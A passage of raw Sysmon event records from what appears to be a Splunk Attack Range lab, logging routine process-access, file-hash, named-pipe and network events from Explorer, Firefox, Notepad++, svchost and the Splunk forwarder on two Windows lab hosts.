Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049957Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.653{466BC892-32D3-60E8-770B-00000000CF01}63567412C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049956Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.436{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A997829E66B6DB6FC05590FAB98865DA,SHA256=E6C2143CC17A086134E8FEE910A6C983B6F05E9BB946AFED9A565ABBC114AA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808049Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:06.007{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D560F7A0634E85FB9A956347DE3F2DD6,SHA256=613239458608DEBB289439F16623840CB9D09AAD079748EC900E0F242B33F75D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049955Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.305{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049954Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.237{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001049953Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:06.237{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-3465-60E8-160C-00000000CF01}6264C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001049952Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:55:06.237{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.6264.1214.81061823C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001049951Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:55:06.237{466BC892-3465-60E8-160C-00000000CF01}6264\chrome.6264.1214.81061823C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001049967Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.437{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BE0C879DF3402A02D1ABBF84FE86C8C,SHA256=26EEACF7B80DD4A5ADB4EFA32AA71C91090572E18E649860CD8D785361B6EC8D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808051Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:05.311{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57301-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808050Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:07.022{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F854BA2E7DBC4D27D87708FA2C29F3C,SHA256=7B07C9CC9087CEF505D9B6CBD3E6F033E59379C7AC6F7C1EEDD13CAFD6EBD116,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049966Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.006{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_075428MD5=5BEE8ECB07A38ED4E6739819036B602D,SHA256=4DE1D22F8A87DFCDCD674F842B5E7A496548EE74FBC0DF9C41EE198563227FCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049965Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:07.006{466BC892-F4EE-60EB-437D-00000000CF01}5240ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Program Files\ansible\AttackRangeSysmon.xmlMD5=FB65D6C1F8C0BBD38377AE359F2DD61A,SHA256=3BD9132356DA74C4826ED4866ECB3DDF33ADCB463C274422A80FF45C746C36EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049969Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:08.452{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46DB55866711BD30CF2C992EB4372F0B,SHA256=10882E158BF2A95EE11127043CA1A66BB3B840B4B5CADCF0912084E4313B83BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808052Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:08.038{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E0DDFF6AEE21B4235C85035DD36519,SHA256=7759D0F5A9D63BD6306D3A27F88133F30CB76B6C39B63C2151AF0ECC59DB9EE3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049968Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:54:59.609{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51067-false10.0.1.12-8000- 23542300x8000000000000000808053Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:09.085{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1A9630421DA02CF5873F41CCEE570DC,SHA256=371350EB1898076C0BBD7AA4C5DA4121BE6C9F4AFE27930CD26522CAA190EDE7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049970Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:09.469{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13A92069A80167EEF9E36983AB5DA79C,SHA256=A07874189448A8B842D12CDC28C14ECFD834031A874538E81DA03A8A37FE0A83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049971Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:10.487{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=203800C5ACA490A7105661C4021E4397,SHA256=3CCFA997E9B2FD5EE3AD0FF105DFE78724155C6F21F471B9CE93DF6F0ABFAD5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808054Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:10.100{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E33E7D9DC41D6AB9036FE12A32092C48,SHA256=D49458F65C6986FC1A4F05F5091E506D8E27FE91DE88666E0D939EE6C754BFC2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.965{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049989Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049988Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.936{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001049986Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.501{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C232C55C0D7FD40E00763090594F40B,SHA256=43BD8036FF027793D8E5AD8AA8E831BF7F9AFF1F038C03988710DAD247356254,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808055Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:11.132{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17C3AA92D2BD4E74C9DCC8B3CDC29797,SHA256=CDD32F6D44EBD634192612E391716DFA06B787E61ED2BCDCC0F97FF1C86403AF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049985Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.389{466BC892-32D3-60E8-700B-00000000CF01}16645372C:\Windows\System32\sihost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001049984Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:11.389{466BC892-02AF-60E8-0C00-00000000CF01}84410140C:\Windows\system32\svchost.exe{466BC892-F524-60EB-4C7D-00000000CF01}7300C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001049983Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 